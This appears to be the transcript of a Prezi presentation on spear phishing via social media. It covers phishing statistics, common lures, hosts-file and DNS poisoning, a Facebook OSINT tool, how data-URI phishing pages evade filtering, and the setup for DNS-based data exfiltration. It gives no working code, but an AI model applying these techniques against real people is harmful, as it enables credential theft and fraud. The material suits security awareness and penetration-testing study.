Send the link below via email or IMCopy
Present to your audienceStart remote presentation
- Invited audience members will follow you as you navigate and present
- People invited to a presentation do not need a Prezi account
- This link expires 10 minutes after you close the presentation
- A maximum of 30 users can follow your presentation
- Learn more about this feature in our knowledge base article
Spear phishing with social media
Transcript of Spear phishing with social media
Phishing as threat
"Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication."
Open Source Security
Penetration testing execution standard
91% of ATP begin with spear phishing
Each phishing attack compromises a very small number of customers (0.000564%), but due the large number of phishing attacks, the aggregated number is significant
45% of bank customers who are redirected to a phishing site divulge their personal credentials
analysis of 69,000 workers around the world found that 23 percent fell for spear phishing scenarios
0.47% of a bank’s customers fall victim to Phishing attacks each year, which translates to between $2.4M-$9.4M in annual fraud losses per one million online banking clients
Phishing - Types of attack
Correct account details
Account in risk
Cancel fake order
Dispute unauthorized change
Keyloggers and Screenloggers
Host file poisoning
System Reconfiguration attack
Host file change
Poison DNS catche
fbStalker - OSINT tool for Facebook - Based on Facebook Graph and other stuff
The data URI scheme is a URI (uniform resource identifier) scheme that provides a way to include data in-line in web pages as if they were external resources. It is a form of a file literal or here document. This technique allows normally separate elements such as images and style sheets to be fetched in a single HTTP request rather than multiple HTTP requests, which can be more efficient.
Benefits of Data URI
Phishing web pages may be more elusive as they are passed around the Internet because phishing no longer requires web hosting of the page.
It also defeats traditional defenses against phishing attacks, such as web filtering and reputation management, because victims don’t need to communicate to an attack server to get phished.
We can create the phishing pages more easily. A personalized phishing web page can be created automatically, based on gathered information, and transmitted to one victim only. There is reason to believe that the data URI scheme can provide other unknown attack vectors.
What You Need
A domain 'yourdomain.com' where you can delegate zones and set NS resource records in DNS.
A standard DNS server of your choice (ex. BIND) with query logging enabled.
A sub-zone named 'file1.yourdomain.com' with a NS record pointing to the logging DNS server.
A programming or scripting language. Python, C++, bash, powershell, etc.